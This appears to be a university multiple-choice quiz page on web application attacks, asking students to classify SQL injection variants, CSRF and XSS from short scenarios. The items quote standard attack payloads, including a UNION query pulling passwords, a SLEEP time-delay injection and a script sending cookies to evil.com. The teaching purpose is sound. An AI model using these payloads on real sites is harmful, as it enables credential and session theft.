Web Application Attacks

Web Application Attacks

University

10 Qs

quiz-placeholder

Similar activities

Attacks

Attacks

University

10 Qs

Social Engineering

Social Engineering

University

10 Qs

IMC 413 _CHAPTER 13

IMC 413 _CHAPTER 13

University

10 Qs

Week 2 Quiz 2 Security Principles

Week 2 Quiz 2 Security Principles

University

10 Qs

Викторина по кибербезопасности

Викторина по кибербезопасности

University

13 Qs

Mạng máy tính - Đề 4

Mạng máy tính - Đề 4

University

10 Qs

QuizATTT

QuizATTT

University

14 Qs

Operating System

Operating System

University

15 Qs

Web Application Attacks

Web Application Attacks

Assessment

Quiz

Information Technology (IT)

University

Practice Problem

Hard

Created by

Beulah Christudas

Used 1+ times

FREE Resource

AI

Enhance your content in a minute

Add similar questions
Adjust reading levels
Convert to real-world scenario
Translate activity
More...

10 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user enters ' OR 1=1-- in a login form, but no error is shown. Instead, the page behaves differently when true or false conditions are injected. There’s no visible database error message, but the attacker observes the application's response changing depending on the input. What type of

SQLi attack is this?

Time-based Blind SQLi

Boolean-based Blind SQLi

Retrieving Hidden Data

Subverting Application logic

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker submits the following input:
' UNION SELECT username, password FROM users--
This causes the application to display usernames and passwords from a different table.

What type of attack is this?

Blind SQLi

Union-based SQLi

Error-based SQLi

Boolean-based SQLi

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

An attacker sends the input:
1' OR IF(1=1, SLEEP(5), 0)--
The server takes a long time to respond, suggesting that the attacker can infer whether a condition is true or false based on the response delay.

What type of SQLi attack is this?

Retrieving Hidden Data

Boolean-based Blind SQLi

Subverting Application logic

Time-based Blind SQLi

4.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Alice is logged into her bank account in one browser tab. She clicks a link on a malicious website in another tab. Without her knowledge, a request is sent to https://bank.com/transfer?to=attacker&amount=1000, and the money is transferred.

What type of attack is this?

Cross-site Scripting

Cross-site Request Forgery

SQL Injection

Session Hijacking

5.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A user comments on a blog post by entering the following code:

<script>document.location='http://evil.com/steal?cookie=' + document.cookie</script>

Every time someone views the comment, their browser executes the script and sends their cookie to the attacker’s server.

What type of attack is this?

Reflected XSS

Stored XSS

DOM-Based XSS

Blind SQLi

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

A search form on an e-commerce website allows users to search for products. The intended query is:

SELECT * FROM products WHERE category = 'electronics' AND released = 1;

An attacker modifies the URL to: https://example.com/products?category=electronics'--

What is the effect of this attack?

Subverting application logic

Retrieving hidden data

Time delay

Detailed error

7.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

What type of SQL Injection manipulates application logic to change how a query behaves?

Subverting application logic SQLi

Retrieving Hidden Data SQLi

Blind SQLi

Union based SQLi

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Google

Continue with Google

Email

Continue with Email

Classlink

Continue with Classlink

Clever

Continue with Clever

or continue with

Microsoft

Microsoft

Apple

Apple

Others

Others

Already have an account?